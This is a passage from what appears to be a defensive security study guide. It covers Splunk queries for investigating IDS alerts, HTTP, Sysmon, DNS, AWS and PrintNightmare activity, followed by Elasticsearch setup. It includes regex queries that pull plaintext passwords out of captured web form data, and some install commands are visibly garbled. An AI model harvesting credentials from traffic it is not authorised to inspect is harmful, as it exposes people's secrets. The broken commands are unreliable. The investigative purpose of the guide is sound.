necessary in this case, but it provides a good way to see
the description and the associated ID of the signature
accompanied by the count.
Example
 index=dataset sourcetype=suricata
 alert.signature=*keyword* | stats count by
 alert.signature alert.signature_id | sort
 count
Scenario 2
This scenarios focuses on the point we mentioned earlier
about extracting IDS alerts.
We can display all IDS alerts
 index=dataset sourcetype=suricate | stats
 values(alert.signature)
After we display alerts, we narrow down our efforts on a
specific alert that was triggered by a malware infection.
 index=dataset sourcetype=suricate
 "alert.signature"="ET MALWARE Win32/Trickbot
 Data Exfiltration"
And then we can extract relevant details and IOCs about
the malware such as the source and destination IPs
                            426 / 547
                            HTB CDSA
 index=dataset sourcetype=suricate
 "alert.signature"="ET MALWARE Win32/Trickbot
 Data Exfiltration" | table src, dest
Parsing http traffic
Looking through http traffic with domain name as a
keyword
 index=dataset domain.com
 sourcetype=stream:http
Pasrsing http traffic for specific source ip
 index=botsv1 src=192.168.250.70
 sourcetype=stream:http
Investigating http protocol with http responses being equal
to [200] and count the number of hits per URL
  index=* dest=192.168.250.70
 sourcetype=stream:http status=200 | stats
 count by uri | sort - count
Investigating IIS logs
 index=* sourcetype=iis
Investigating HTTP post requests and displaying
authentication information
                            427 / 547
                          HTB CDSA
 - index=* sourcetype=stream:http
 http_method=POST form_data=*username*passwd*
 | table form_data
Using regular expressions to display usernames and
passwords in http requests
 index=* sourcetype=stream:http
 form_data=*username*passwd*
 | rex field=form_data "passwd=(?
 <userpassword>\w+)"
 | head 10
 | table userpassword
Using regular expressions to display usernames and
passwords in http requests and display the count of the
password length
 index=* sourcetype=stream:http
 form_data=*username*passwd*
 | rex field=form_data "passwd=(?
 <userpassword>\w+)"
 | eval lenpword=len(userpassword)
 | table userpassword lenpword
Using lowercase and uppercase on the password
 index=* sourcetype=stream:http
 form_data=*username*passwd*
 | rex field=form_data "passwd=(?
                           428 / 547
                          HTB CDSA
 <userpassword>\w+)"
 | eval lenpword=len(userpassword)
 | search lenpword=6
 | eval password=lower(userpassword)
Sorting by time
 index=* sourcetype=stream:http
 form_data=*username*passwd*
 dest_ip=192.168.250.70 src=40.80.148.42
 | rex field=form_data "passwd=(?
 <userpassword>\w+)"
 | search userpassword=*
 | table _time uri userpassword
Searching for specific password
[1]
 index=* sourcetype=stream:http | rex
 field=form_data "passwd=(?<userpassword>\w+)"
 | search userpassword=batman | table _time
 userpassword src
[2]
 index=* sourcetype=stream:http
 | rex field=form_data "passwd=(?
 <userpassword>\w+)"
 | search userpassword=batman
                          429 / 547
                           HTB CDSA
 | transaction userpassword
 | table duration
Looking for executable files transferred through [http]
[1]
 index=* sourcetype=stream:http .exe
[2]
 index=* sourcetype=stream:http uri=*.exe |
 stats values(uri)
Looking through get requests for a specific domain
 index="dataset" domain.com
 sourcetype="stream:http" http_method=GET
Looking through visited websites from a source ip with an
exclusion list.
 index="dataset" ip sourcetype="stream:HTTP"
 NOT (site=*.microsoft.com OR site=*.bing.com
 OR site=*.windows.com OR site=*.atwola.com OR
 site=*.msn.com OR site=*.adnxs.com OR
 site=*.symcd.com OR site=*.folha.com.br)
 | dedup site
 | table site
Displaying URL values between a client and a server. This
is useful if you are looking for patterns of web application
                            430 / 547
                           HTB CDSA
attacks or OWASP attacks such as SQL injection, IDOR, File
inclusion or directory traversal. All these attacks happen
over URLs
 index=* src=10.0.0.10 dest=10.0.0.11
 sourcetype=http | stats values(uri)
Parsing general network traffic
Counting the number of requests initiated from the
network [domain.com] and sort them by IP Address.
 index=dataset domain.com sourcetype=stream* |
 stats count(src_ip) as Requests by src_ip |
 sort - Requests
Looking for an image transferred between two ips
 index=dataset dest=23.22.63.114 "image.jpeg"
 src=192.168.250.70
Looking through specific file extensions on a host. Useful
for investigating what file(s) was encrypted by a
ransomware
 index="dataset" host="MACLORY-AIR13" (*.ppt OR
 *.pptx)
Parsing Sysmon events
Looking for an executable name [name] in sysmon events
                            431 / 547
                            HTB CDSA
 index=dataset name.exe
 sourcetype=XmlWinEventLog:Microsoft-Windows-
 Sysmon/Operational
Looking for process creation events with a named
executable
 index=dataset name.exe
 sourcetype=XmlWinEventLog:Microsoft-Windows-
 Sysmon/Operational EventCode=1
Sorting by MD5 hashes and
 index=dataset name.exe CommandLine=name.exe
 | stats values(MD5)
searching with the hostname of a PC. Replace hostname
and its value
 index=botsv1 hostname
 sourcetype=XmlWinEventLog:Microsoft-Windows-
 Sysmon/Operational
Looking through scheduled tasks activity.
 index="dataset" schtasks.exe
 sourcetype="XmlWinEventLog:Microsoft-Windows-
 Sysmon/Operational"
 | dedup ParentCommandLine
                            432 / 547
                           HTB CDSA
 | dedup CommandLine
 | table ParentCommandLine CommandLine
Parsing Fortinet Firewall logs
Looking for hits to malicious websites and providing an ip
address
 index=dataset sourcetype=fgt_utm
 "192.168.250.70" category="Malicious Websites"
Looking though process that changed file creation time.
Useful to look for files left by a malicious executable such
as [ransomware]. Remember to add double [\] in the
path.
 index=dataset
 sourcetype=XmlWinEventLog:Microsoft-Windows-
 Sysmon/Operational host=hostname EventCode=2
 TargetFilename="pathtofile" | stats
 dc(TargetFilename)
USB attacks
USB records can be found in the windows registry. You
can also use somekeywords if you have info about the USB
 index=dataset sourcetype=winregistry keyword
Sorting by the host and object
                            433 / 547
                           HTB CDSA
 index=dataset sourcetype=winregistry keyword |
 table host object data
Finding Sysmon Events for The Infected System on an
External Drive and show oldest events first. The external
drive letter is [d:]
 index=dataset
 sourcetype=XmlWinEventLog:Microsoft-Windows-
 Sysmon/Operational host=targetpcname "d:\\" |
 reverse
Refining Our Search To Find [D:] ONLY in Command and
Parent Command Line. we use the parenthesis with OR so
that we can look for a reference to [D:] in either the
CommandLine field or the ParentCommandLine field. We
then can take our results and table both fields along with
_time and then sort oldest to newest.
 index=dataset
 sourcetype=XmlWinEventLog:Microsoft-Windows-
 Sysmon/Operational host=targetpcname
 (CommandLine="*d:\\*" OR
 ParentCommandLine="*d:\\*") | table _time
 CommandLine ParentCommandLine | sort _time
Finding the vendor name of a USB inserted into a host
 index="dataset" host=hostname usb
                           434 / 547
                           HTB CDSA
File sharing
File sharing events can be found in sysmon
 index=dataset
 sourcetype=XmlWinEventLog:Microsoft-Windows-
 Sysmon/Operational host=hostname
If we have information about the file server address
domain name we can use it
 index=dataset
 sourcetype=XmlWinEventLog:Microsoft-Windows-
 Sysmon/Operational host=hostname
 src="filserver.com"
By adding the stats command we can quickly see the
number of network connections the host has made.
 index=dataset
 sourcetype=XmlWinEventLog:Microsoft-Windows-
 Sysmon/Operational host=hostname
 src="filserver.com" | stats count by dest_ip |
 sort - count
Identifying the Hostname of the File Server
We can do that by specifying its ip address.
 index=dataset
 sourcetype="XmlWinEventLog:Microsoft-Windows-
                           435 / 547
                           HTB CDSA
 Sysmon/Operational" ip
Parsing DNS
Scenario[1]
Its useful to find C2C domains when investigating a
compromised network or machine.
By using conditions like AND OR and NOT to narrow down
search criteria, we can quickly exclude domains that we
don't have an interest in. Keep in mind AND is implied
between conditions
Rather than writing our search such that the query does
not equal x and the query does not equal y, we can use
parenthesis to group a number of conditions in this manner
(query=x OR query=y) and then place a NOT statement in
front of the parenthesis to apply to the entire group of
query values. Either syntax is acceptable.
Example is below. We can look through A records for a
specific ip and ignore a list of domains.
 index=dataset sourcetype=stream:DNS
 src=192.168.250.100 record_type=A NOT
 (query{}=*.microsoft.com OR query{}=*.bing.com
 OR query{}=*.bing.com OR query{}=*.windows.com
 OR query{}=*.msftncsi.com) | stats count by
 query{} | sort - 10 count
By tabling the result set and then using the reverse
command we get the earliest time and query at the top of
the list.
                            436 / 547
                          HTB CDSA
 index=dataset sourcetype=stream:DNS
 src=192.168.250.100 record_type=A NOT
 (query{}=*.microsoft.com OR
 query{}=*.waynecorpinc.local OR
 query{}=*.bing.com OR query{}=isatap OR
 query{}=wpad OR query{}=*.windows.com OR
 query{}=*.msftncsi.com) | table _time query{}
 src dest | reverse
#TIP
To understand the relationship between processes started
and their parent/children, we can use the table command
to see the time along with the process that was
executed, its associated parent process command, the
process ID and parent process ID. Using the reverse
command moves the first occurrence to the top. The IDs
provide the linkage between these different processes.
While Sysmon can show the immediate parent process that
spawned another process in a single event, it cannot
show an entire chain of processes being created.
Scenario [2]
Sometimes we want statistical information about the DNS
connections. One of which is the round trip time or RTT.
This metric measures the time spent from when the DNS
query was sent until the answers is received.
Say we want to calculate RTT sent to a specific
destination IP
 index=* sourcetype=dns dest=10.10.10.10 |
 stats avg(rtt) as avgrtt | eval
                           437 / 547
                             HTB CDSA
 avgrtt=round(avgrtt,5)
You can use RTT for network troubleshooting as well to
detect delay in DNS responses. We can sort       rtt   in
reverse order and then use     _time     to check the highest
delay in minutes.
 index=* sourcetype=dns dest=10.10.10.10 | sort
 - rtt | table _time, rtt
Or we can group RTT by one minute slot and then calculate
the average.
 index=* sourcetype=dns dest=10.10.10.10 |
 bucket _time span=1m | stats avg(rtt) by _time
Email Activity
Examining smtp events with keywords such as email
address and domain name
 index="dataset" sourcetype=stream:smtp
 email@email.com domain.com
Finding zip attachments
 index="dataset" sourcetype="stream:smtp" *.zip
We can also list emails by subject and sender
                             438 / 547
                          HTB CDSA
 index="dataset" sourcetype="stream:smtp" |
 table mailfrom, subject
Then we can examine the emails/events generated by a
specific sender
 index="dataset" sourcetype="stream:smtp"
 mailfrom=test@test.com
FTP events
Looking through downloaded files
 index="botsv2" sourcetype="stream:ftp"
 method=RETR
 | reverse
AWS Events
Listing out the IAM users that accessed an AWS service
(successfully or unsuccessfully)
 index="dataset" sourcetype="aws:cloudtrail"
 IAMUser
 | dedup user
 | table user
Looking through AWS API activity that has occurred without
MFA (multi-factor authentication)
                           439 / 547
                            HTB CDSA
 index="dataset" sourcetype="aws:cloudtrail"
 NOT tag::eventtype="authentication"
 "userIdentity.sessionContext.attributes.mfaAut
 henticated"=false
Looking through events related to n S3 bucket publicly
accessible.
 index="dataset" sourcetype="aws:cloudtrail"
 eventType=AwsApiCall eventName=PutBucketAcl
 | reverse
Looking through files that were successfully uploaded into
the S3 bucket
 index="dataset"
 sourcetype="aws:s3:accesslogs" *PUT* | reverse
 |
Looking through full process usage information on aws
instance.Useful to find coin mining activity
 index="dataset" sourcetype="PerfmonMk:Process"
 process_cpu_used_percent=100
 | table _time host process_name
 process_cpu_used_percent
Finding IAM user access key that generates the most
distinct errors when attempting to access IAM resources
                            440 / 547
                           HTB CDSA
 index="dataset" sourcetype="aws:cloudtrail"
 user_type="IAMUser" errorCode!="success"
   eventSource="iam.amazonaws.com"
 | stats dc(errorMessage) by
 userIdentity.accessKeyId
Given a key, we can look through the unauthorized
attempts to create a key for a specific resource.
 index="dataset" sourcetype="aws:cloudtrail"
 userIdentity.accessKeyId="AKIAJOGCDXJ5NW5PXUPA
 " eventName=CreateAccessKey
Given a key, we can look through the unauthorized
attempts to describe an account.
 sourcetype="aws:cloudtrail"
 userIdentity.accessKeyId="AKIAJOGCDXJ5NW5PXUPA
 "
   eventName="DescribeAccountAttributes"
Symantec endpoint protection events
Investigating coin mining attacks and findig the signature
ID
[1]
 index="dataset" sourcetype="symantec:*" *coin*
 | table _time CIDS_Signature_ID
                            441 / 547
                           HTB CDSA
[2]
 index="dataset" sourcetype="symantec:*" *coin*
O365 Events
Looking through file upload events to onedrive
 index="dataset"
 sourcetype="ms:o365:management"
 Workload=OneDrive Operation=FileUploaded
 | table _time src_ip user object UserAgent
WIN event logs
Finding antivirus alerts. In the example below we used
symantec antivirus. Useful to find malicious exes
 index="dataset"
 source="WinEventLog:Application"
 SourceName="Symantec AntiVirus" *Frothly*
Looking through users created
 index="dataset" source="wineventlog:security"
 EventCode=4720
Finding groups a user assigned to
 index="dataset" source="wineventlog:security"
                           442 / 547
                           HTB CDSA
 svcvnc "EventCode=4732"
Listing URLs accessed through [powershell]
 index="dataset" source="WinEventLog:Microsoft-
 Windows-PowerShell/Operational" Message="*/*"
 | rex field=Message "\$t\=[\'\"](?<url>
 [^\'\"]+)"
 | table url
Linux events
Looking through users added along with their passwords
 index="dataset" (adduser OR useradd)
 source="/var/log/auth.log"
Osuery
Looking through users added along with their passwords
[Linux]
 index="botsv3" sourcetype="osquery:results"
 useradd
Finding information about a process listening to [1337]
port
 index="dataset" 1337
 sourcetype="osquery:results"
 "columns.port"=1337
                           443 / 547
                            HTB CDSA
SSH Events
When parsing SSH events, we mainly aim to detect failed
SSH logins which indicate possible brute force attacks or
successful SSH logins for the purpose of auditing.
Below will list successful logins from   10.0.0.10
 index=* src=10.0.0.10 sourcetype=ssh
 auth_success=true
Likewise, for failed logins you can change   auth_success
to   false   in the query above.
Detecting PrintNightmare vulnerability
Identifies Print Spooler adding a new Printer
Driver
 source="WinEventLog:Microsoft-Windows-
 PrintService/Operational"
 EventCode=316 category = "Adding a printer
 driver" Message = "*kernelbase.dll,*" Message
 = "*UNIDRV.DLL,*" Message = "*.DLL.*"
 | stats count min(_time) as firstTime
 max(_time) as lastTime by OpCode EventCode
 ComputerName Message
Detects spoolsv.exe with a child process of
rundll32.exe
                             444 / 547
                     HTB CDSA
| tstats count min(_time) as firstTime
max(_time) as lastTime from
datamodel=Endpoint.Processes where
Processes.parent_process_name=spoolsv.exe
Processes.process_name=rundll32.exe by
Processes.dest Processes.user
Processes.parent_process
Processes.process_name Processes.process
Processes.process_id
Processes.parent_process_id
Suspicious rundll32.exe instances without any
command-line arguments
| tstats count FROM
datamodel=Endpoint.Processes where
Processes.process_name=spoolsv.exe by _time
Processes.process_id Processes.process_name
Processes.dest
| rename "Processes.*" as *
| join process_guid _time
    [| tstats count min(_time) as firstTime
max(_time) as lastTime FROM
datamodel=Endpoint.Filesystem where
Filesystem.file_path="*\\spool\\drivers\\x64\\
*" Filesystem.file_name="*.dll" by _time
Filesystem.dest Filesystem.file_create_time
Filesystem.file_name Filesystem.file_path
    | rename "Filesystem.*" as *
                     445 / 547
                           HTB CDSA
     | fields _time dest file_create_time
 file_name file_path process_name process_path
 process]
 | dedup file_create_time
 | table dest file_create_time, file_name,
 file_path, process_name
Detects when a new printer plug-in has failed
to load
 source="WinEventLog:Microsoft-Windows-
 PrintService/Admin" ((ErrorCode="0x45A"
 (EventCode="808" OR EventCode="4909"))
 OR ("The print spooler failed to load a plug-
 in module" OR "\\drivers\\x64\\"))
   | stats count min(_time) as firstTime
 max(_time) as lastTime by OpCode EventCode
 ComputerName Message
Creating Alerts
The above discussed scenarios include different instances
and cases of cyber incident investigation. The queries can
be run in real-time as you investigate or you can use and
save them as #alerts.
Sometimes, we want to be alerted if a certain event
happens, such as, if the amount of failed logins on a
single account reaches a threshold, it indicates a brute
force attempt, and we would like to know as soon as it
happens. In that case, creating alerts is the way to go.
                           446 / 547
                            HTB CDSA
Alerts are the most common way analysts can monitor the
network for cyber incidents.
To create an alert, while running any query choose save
as alert
Next we see the alert type we are setting up is
scheduled.
This means that Splunk will run this search as per the
schedule, and if the trigger condition is satisfied, an alert
will be raised.
                            447 / 547
                            HTB CDSA
Trigger conditions define the conditions when the alert will
be raised.
Let's say we raise the alert when the login count of our
user is more than 5. In that case, we will use the
'Number of Results' option and set the 'is greater than'
option to 5. We can trigger 5 alerts for the 5 login times,
or we can just trigger a single alert for exceeding this
count.
The 'Throttle' option lets us limit the alerts by not raising
an alert in the specified time period if an alert is already
triggered. This can help reduce alert fatigue, which can
overwhelm analysts when there are too many alerts.
The final option here is for Trigger Actions. This option
allows us to define what automated steps Splunk must
take when the alert is triggered. For example, we might
want Splunk to send an email to the SOC email account in
                             448 / 547
                           HTB CDSA
case of an alert.
Reporting With Splunk
Reports help analysts automate the process of running
data searches at specific time intervals.
For example, multiple searches can be scheduled to run at
the start of every shift automatically without any user
interaction. The searches will be saved and reports will be
created for each search operation.
Reports can be accessed from the main menu. Below we
can see a list of reports already saved in Splunk.
If we want to run a new search using the same query as
the one in a report, we can use the 'Open in Search'
option.
                           449 / 547
                            HTB CDSA
To create a new report, we can run a search and use the
Save As option to save the search as a report.
Creating Dashboards
Dashboards are frequently designed to assist in providing a
concise summary of the most significant data points. They
are frequently useful for providing facts and statistics to
management, such the quantity of events in a specific
time period, or for helping SOC analysts determine where
to concentrate, like locating spikes and declines in data
sources that would point to an increase in, say,
                            450 / 547
                           HTB CDSA
unsuccessful login attempts. Dashboards are mostly used
to present a brief visual summary of the information that
is accessible.
Dashboards can be created by navigating through the
menu, clicking on Dashboards and then clicking on the
button   create new dashboard .
After filling in the relevant details, such as the name and
permissions, we can choose one of the two options for
dashboard creation through Classic Dashboards or
Dashboard Studio.
We can then load the results of a report that ran before
into the dashboard to view them in a visualization
                            451 / 547
                           HTB CDSA
We can then select the type of visualization we want
ELK
Definition
Elastic stack is the collection of different open source
components linked together to help users take the data
from any source and in any format and perform a search,
analyze and visualize the data in real-time.
Purpose of ELK
Elastic Stack or Elastic, Logstash & Kibana are mainly
used for:
     Data analytics.
                            452 / 547
                           HTB CDSA
     Security and threat detection.
     Performance monitoring.
Methodology
ELK can be overwhelming at first but if you understand
what you want to achieve from the beginning, you will
have no issues moving forward.
I am a data analyst, how should I start?
If you intend to use elastic stack for data analysis then
most probably you have your datasets ready in text
format. Remember that elastic search is a full-text search
engine so your dataset should be in text.
You can't analyze relational databases with elastic stack.
Steps to start:
     Have your dataset ready.
     Follow the steps below to install elastic search,
     Logstash and Kibana.
     After successful installation, head over to Kibana and
     create an index (explained below) that will store
     your data.
     Depending on the dataset you have, you may need to
     create an   index template         and   pipeline   to
     appropriately parse your data according to its type.
     Use   Logstash   to manually supply your dataset via
     the command line and ingest it to your previously
     created index.
     Navigate to   Management-->Dev Tools-->Console
     to start executing queries to search and manipulate
     your data.
                            453 / 547
                              HTB CDSA
     If you are looking to create visualizations, you will
     need to create a      data view      for your index in
     Kibana then you can create a         visualization
I am a security engineer, how should I
start?
If you are in SOC, most likely your data consists of mainly
web logs, server logs, network logs, etc which means
you will rely heavily on elastic search to parse your logs
into appropriate fields.
Steps to start:
     Follow the steps below to install elastic search and
     Kibana. Install Logstash if you want to collect logs
     from network devices (firewall, IPS,etc).
     After successful installation, head over to Kibana and
     create an index (explained below) that will store
     your data.
     Use either   elastic agents          or   Beats   to start
     collecting log data from your monitored endpoints.
     Again I prefer to use    Logstash         only if I want to
     connect from network devices.
     Create a   data view     for your index to be able to
     start searching the logs using        Discover section        in
     Kibana.
Components of elastic stack
Before we dig deeper into each component, keep in mind
you can use all elastic stack components without the need
to install locally by using the cloud version.
Check the link below to get started:
                              454 / 547
                           HTB CDSA
 https://www.elastic.co/cloud/elasticsearch-
 service/signup?page=docs&placement=docs-body
Elastic Search
Elasticsearch is a full-text search and analytics engine
used to store JSON-formated documents. Elasticsearch is
an important component used to store, analyze, perform
correlation on the data, etc.
It is built on top of Apache Lucene and provides a scalable
solution for full-text search, structured querying, and
data analysis.
Elasticsearch supports RESTFul API to interact with the
data.
Purposes of Using Elastic Search
     Ingesting, storing, and searching through large
     volumes of data.
     Getting relevant search results from textual data.
     Aggregating data.
     Acting on data in near real time.
     Working with unstructured/semi-structured data
Elastic search may not be suitable for:
     Handling relational datasets.
     Performing ACID transactions.
Elastic Search Index
When users want to store data (or documents) on
Elasticsearch, they do so in an index. An index on
                           455 / 547
                           HTB CDSA
Elasticsearch is a location to store and organize related
documents. They don't all have to be the same type of
data, but they generally have to be related to one
another.
Indexing is the action of writing documents into an
Elasticsearch index. Elasticsearch will index individual
document fields to make them searchable as part of the
indexing request.
Components of an Index
An index is made up of primary shards. Primary shards
can be replicated into replica shards to achieve high
availability. Each shard is an instance of a Lucene index
with the ability to handle indexing and search requests.
The primary shard can handle both read
and write requests, while replica shards are read-only.
When a document is indexed into Elasticsearch, it is
indexed by the primary shard before being replicated to
the replica shard. The indexing request is only
acknowledged once the replica shard has been
successfully updated, ensuring read consistency across
the Elasticsearch cluster. Primary and replica shards are
always allocated on different nodes, providing redundancy
and scalability.
Creating an Index
An Elasticsearch index can be created using the Create
Index API.
You can create your first index to store documents and
data by opening Kibana and navigating into Management---
>Dev Tools and select Console to run your commands.
                            456 / 547
                           HTB CDSA
You can create an index by running the below command:
 PUT my-index
To view the index you created, run the following:
 GET my-index
To view all the indices on the cluster, run the following:
 GET _cat/indices
You can specify custom index settings in the create index
request. The following request
creates an index with three primary shards and one
replica:
 PUT my-other-index
 {
     "settings": {
       "index": {
         "number_of_shards": 3,
                            457 / 547
                           HTB CDSA
           "number_of_replicas": 1
           }
      }
 }
Storing data in an index
Data stored in an index are called documents.
Elasticsearch documents are JSON objects that are stored
in indices. JSON documents in Elasticsearch consist of
fields (or key/value pairs).
Indexing a document in Elasticsearch is simple and can be
done by specifying the document ID:
 # Index a document with _id 1
 PUT my-index/_doc/1
 {
 "year": 2021,
 "city": "Damascus",
 "country": "Syria",
 "population_M": 5.2
 }
 # Index a document with _id 2
 PUT my-index/_doc/2
 {
 "year": 2022,
 "city": "Damascus",
 "country": "Syria",
 "population_M": 4.82
 }
                           458 / 547
                            HTB CDSA
You can retrieve all the documents in the index by running
the following command:
 GET my-index/_search
To maximize indexing/search performance, shards should
be evenly distributed across nodes when possible to take
advantage of underlying node resources. Each shard
should hold between 30 GB and 50 GB of data, depending
on the type of data and how it is used.
Mappings
All the fields in a document need to be mapped to a data
type in Elasticsearch. Mappings specify the data type for
each field and also determine how the field should be
indexed and analyzed for search. Mappings are like
schemas when defining tables in a SQL database.
Mappings can be declared explicitly or generated
dynamically.
If you don't specify field mappings explicitly while
indexing the fields, Elasticsearch will automatically and
dynamically create index mappings for you.
When a document containing new fields is indexed,
Elasticsearch will look at the value of the field in question
to try and guess the data type it should be mapped to.
Once a field has been mapped in a given index, it cannot
be changed. If subsequent documents contain conflicting
field values (a string value instead of an integer, for
example), the indexing request will not succeed.
To fix an incorrect or suboptimal index mapping, the data
in the index needs to be reindexed into a different index
with properly defined mappings.
                            459 / 547
                            HTB CDSA
In the above index we created that contains documents
about city information, you can explicitly specify the field
mappings by using   type   so the complete request will
look similar to the one below:
 PUT my-explicit-index
 {
 "mappings": {
     "properties": {
         "year": {
             "type": "integer"
             },
         "city": {
             "type": "keyword"
             },
         "country": {
             "type": "keyword"
             },
         "population_M": {
             "type": "float"
             },
         "attractions": {
             "type": "text"
             }
         }
     }
 }
Then we index a document in the new index:
                            460 / 547
                            HTB CDSA
 POST my-explicit-index/_doc
 {
     "year": "2021",
     "city": "Melbourne",
     "country": "Australia",
     "population_M": 4.936,
     "attractions": "Queen Victoria markets,
 National Gallery of Victoria, Federation
 square"
 }
More details on mappings and data types below:
 https://www.elastic.co/guide/en/elasticsearch/
 reference/8.0/mapping-types.html
Creating Data View
To start visualizing and searching the index with the data
you created, we will need to create a data view:
     Open Kibana and navigate to Stack Management.
     Click on Data Views under the Kibana section and
     click on Create data view.
     Type in   myindex   as the name of the data view and
     click Next step.
Data views on Kibana map to one or more indices on
Elasticsearch and provide Kibana with
information on fields and mappings to enable visualization
features.
                            461 / 547
                            HTB CDSA
Elastic Search Node
An Elasticsearch node is a single running instance of
Elasticsearch. A single physical or virtual machine can run
multiple instances or nodes of Elasticsearch, assuming it
has sufficient resources to do so.
Elasticsearch nodes perform a variety of roles within the
cluster. The roles that a node performs can be granularly
controlled as required.
Elastic Search Clusters
A group of Elasticsearch nodes can form an Elasticsearch
cluster. When a node starts up, it initiates the cluster
formation process by trying to discover the master-eligible
nodes. A list of master-eligible nodes from previous
cluster state information is gathered if available.
Elastic Search Installation and
configuration
Installation on Windows
Elasticsearch can be installed on Windows using the
Windows    .zip archive. This comes with
a    elasticsearch-service.bat command        which will
setup Elasticsearch to run as a service.
First download from the link below:
    https://artifacts.elastic.co/downloads/elastic
    search/elasticsearch-8.13.4-windows-x86_64.zip
Open command line interpreter and execute the below
commands:
                            462 / 547
                             HTB CDSA
 cd C:\elasticsearch-8.13.4
 .\bin\elasticsearch.bat
Or you can simply execute the bat file after unzipping the
zipped file.
When starting Elasticsearch for the first time, security
features are enabled and configured by default. The
following security configuration occurs automatically:
     Authentication and authorization are enabled, and a
     password is generated for the           elastic    built-in
     superuser.
     Certificates and keys for TLS are generated for the
     transport and HTTP layer, and TLS is enabled and
     configured with these keys and certificates.
     An enrollment token is generated for Kibana, which is
     valid for 30 minutes.
The password for the    elastic           user and the enrollment
token for Kibana are output to your terminal.
For more installation options on Windows, check
the below reference:
 https://www.elastic.co/guide/en/elasticsearch/
 reference/current/zip-windows.html
Installation on Linux
Elasticsearch is available as a          .tar.gz   archive for Linux
and MacOS. The Linux archive for Elasticsearch v8.13.4
can be downloaded and installed as follows:
                             463 / 547
                           HTB CDSA
 wget
 https://artifacts.elastic.co/downloads/elastic
 search/elasticsearch-8.13.4-linux-
 x86_64.tar.gz
 wget
 https://artifacts.elastic.co/downloads/elastic
 search/elasticsearch-8.13.4-linux-
 x86_64.tar.gz.sha512
 shasum -a 512 -c elasticsearch-8.13.4-linux-
 x86_64.tar.gz.sha512
 tar -¯¹ elasticsearch-8.13.4-linux-
 x86_64.tar.gz
 cd elasticsearch-8.13.4/
Run the following command to start Elasticsearch from the
command line:
 ./bin/elasticsearch
When starting Elasticsearch for the first time, security
features are enabled and configured by default. The
following security configuration occurs automatically:
     Authentication and authorization are enabled, and a
     password is generated for the      elastic   built-in
     superuser.
                            464 / 547
                             HTB CDSA
     Certificates and keys for TLS are generated for the
     transport and HTTP layer, and TLS is enabled and
     configured with these keys and certificates.
     An enrollment token is generated for Kibana, which is
     valid for 30 minutes.
The password for the   elastic           user and the enrollment
token for Kibana are output to your terminal.
For more installation options on Linux and
MacOs, check the below reference:
 https://www.elastic.co/guide/en/elasticsearch/
 reference/current/targz.html
Download and install archive for MacOS
The MacOS archive for Elasticsearch v8.13.4 can be
downloaded and installed as follows:
 curl -O
 https://artifacts.elastic.co/downloads/elastic
 search/elasticsearch-8.13.4-darwin-
 x86_64.tar.gz
 curl
 https://artifacts.elastic.co/downloads/elastic
 search/elasticsearch-8.13.4-darwin-
 x86_64.tar.gz.sha512 | shasum -a 512 -c -
 tar -¯¹ elasticsearch-8.13.4-darwin-
 x86_64.tar.gz
                             465 / 547
                            HTB CDSA
 cd elasticsearch-8.13.4/
Installation with docker
If you are installing on-premises, its best to use docker:
 docker network create elastic
 docker pull
 docker.elastic.co/elasticsearch/elasticsearch:
 8.13.4
 docker run --VaU es01 --V  elastic -|
 9200:9200 -| 9300:9300 -
 "discovery.type=single-node" -
 docker.elastic.co/elasticsearch/elasticsearch:
 8.13.4
When installing for the first time, security configuration
will be displayed, including the default password for the
elastic user.
Copy the credentials along with the enrollment tokens
which are needed with Kibana later.
Copying the SSL certificate:
 docker cp
 es01:/usr/share/elasticsearch/config/certs/htt
 p_ca.crt .
                            466 / 547
                           HTB CDSA
Execute the bellow command to ensure that Elastic search
is up and running:
 curl --cac  http_ca.crt -
 elastic:$ELASTIC_PASSWORD
 https://localhost:9200
Installation using Debian Package
Execute below commands:
 wget
 https://artifacts.elastic.co/downloads/elastic
 search/elasticsearch-8.13.4-amd64.deb
 wget
 https://artifacts.elastic.co/downloads/elastic
 search/elasticsearch-8.13.4-amd64.deb.sha512
 shasum -a 512 -c elasticsearch-8.13.4-
 amd64.deb.sha512
 sudo dpkg -0 elasticsearch-8.13.4-amd64.deb
When installing Elasticsearch, security features are
enabled and configured by default. When you install
Elasticsearch, the following security configuration occurs
automatically:
     Authentication and authorization are enabled, and a
     password is generated for the     elastic   built-in
     superuser.
                           467 / 547
                           HTB CDSA
     Certificates and keys for TLS are generated for the
     transport and HTTP layer, and TLS is enabled and
     configured with these keys and certificates.
The password and certificate and keys are output to your
terminal.
Then you can run elastic search:
 ./bin/elasticsearch
You can then configure ElasticSearch to start when the
system starts
 systemctl enable elasticsearch.service
 systemctl start elasticsearch.service
Checking the status of elastic search
 systemctl status elasticsearch.service
For more installation options using the Debian
package, check the below reference:
 https://www.elastic.co/guide/en/elasticsearch/
 reference/current/deb.html#install-deb
Elastic Search Configuration
Elastic Search Config Files
Config files can be found under
/etc/elasticsearch      directory and include:
                              468 / 547
                          HTB CDSA
   elasticsearch.yml :       This is the main configuration
   file for Elasticsearch. It contains various settings
   that determine the behavior of Elasticsearch, such
   as network configuration, cluster settings, node
   settings, and paths for data storage and logging.
   Sample config file is shown below:
# All nodes in a cluster should have the same
name
cluster.name: lab-cluster
# Set to hostname if undefined
node.name: node-a
# Port for the node HTTP listener
http.port: 9200
# Port for node TCP communication
transport.tcp.port: 9300
# Filesystem path for data directory
path.data: /mnt/disk/data
# Filesystem path for logs directory
path.logs: /mnt/disk/logs
# List of initial master eligible nodes
cluster.initial_master_nodes:
# List of other nodes in the cluster
discovery.seed_hosts:
# Network host for server to listen on
network.host: 0.0.0.0
   jvm.options :    The   jvm.options     file contains
   JVM (Java Virtual Machine) configuration settings
   for Elasticsearch. It allows you to specify
                          469 / 547
                            HTB CDSA
   parameters related to memory allocation, garbage
   collection, and other JVM options. It is recommended
   to set the minimum and maximum heap size to the
   same value to avoid resource-intensive memory
   allocation processes during node operations. It is
   also a good idea to allocate no more than half the
   available memory on a node to the JVM heap; the
   remaining memory will be utilized by the operating
   system and the filesystem cache. For example heap
   sizes can be configured using the below variables
   which can be set in the config file:
-Xms4g # Minimum heap size
-Xmx4g # Maximum heap size
    log4j2.properties :
   The log4j2.properties                file is the configuration
   file for Elasticsearch’s logging system, Log4j. It
   defines how Elasticsearch logs different types of
   messages and sets log levels for different
   components. You can modify this file to configure
   the log output format, log rotation, and other
   logging-related settings.
   users :   The    users   file is used for configuring user
   authentication and authorization in Elasticsearch. It
   allows you to define users, roles, and their
   respective permissions.
   roles.yml       and roles_mapping.yml : These              files
   are used in   conjunction with the users file to
   define roles and their mappings to users and
   privileges. Roles provide a way to group users and
   assign common permissions to them.
                            470 / 547
                             HTB CDSA
     The   roles.yml   file defines the roles and their
     privileges, while the   roles_mapping.yml        file maps
